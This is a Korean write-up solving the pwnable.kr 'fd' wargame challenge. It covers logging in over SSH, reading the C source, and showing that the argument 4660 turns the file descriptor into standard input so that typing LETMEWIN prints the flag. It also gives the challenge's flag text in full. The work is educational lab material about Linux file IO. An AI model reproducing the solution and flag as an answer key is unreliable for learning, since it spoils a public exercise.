fd 풀이문서

접속

• 아래 코드를 사용하여 접속

$ ssh fd@pwnable.kr -p2222
pw: (guest)

파일 확인

파일 목록 확인

fd@pwnable:~$ ls -al
total 40
drwxr-x---   5 root   fd   4096 Oct 26  2016 .
drwxr-xr-x 117 root   root 4096 Nov 10 02:06 ..
d---------   2 root   root 4096 Jun 12  2014 .bash_history
-r-sr-x---   1 fd_pwn fd   7322 Jun 11  2014 fd
-rw-r--r--   1 root   root  418 Jun 11  2014 fd.c
-r--r-----   1 fd_pwn root   50 Jun 11  2014 flag
-rw-------   1 root   root  128 Oct 26  2016 .gdb_history
dr-xr-xr-x   2 root   root 4096 Dec 19  2016 .irssi
drwxr-xr-x   2 root   root 4096 Oct 23  2016 .pwntools-cache

fd 파일 확인

fd@pwnable:~$ file fd
fd: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=c5ecc1690866b3bb085d59e87aad26a1e386aaeb, not stripped

• 32bit ELF 파일

fd.c 파일 내용 확인

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2){
		printf("pass argv[1] a number\n");
		return 0;
	}
	int fd = atoi( argv[1] ) - 0x1234;
	int len = 0;
	len = read(fd, buf, 32);
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;

}

• 프로그램의 인자값이 2개 이상인지 확인
• fd 에 atoi( argv[1] ) - 0x1234 값을 대입
• buf 변수에 사용자 입력값을 받음
• "LETMEWIN\n" 과 buf 의 값을 비교 후 값이 같다면 /bin/cat flag 명령어 실행

atoi

• 문자열 값을 int 형으로 변환하는 함수
• ex. atoi("1234") == 1234

read

• 표준입력(0), 표준출력(1), 표준에러(2)

분석

프로그램에 인자를 줌으로써 변경되는 것은 fd 의 값이다.
read 함수에서 표준 입력으로 입력값을 받기 위해서는 fd 의 값이 0 이어야 한다.

즉 인자값의 값이 0x1234 여야 한다.
인자값을 0x1234(4660) 로 주고 실행해보자

exploit

fd@pwnable:~$ ./fd 4660
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!!

• flag : mommy! I think I know what a file descriptor is!!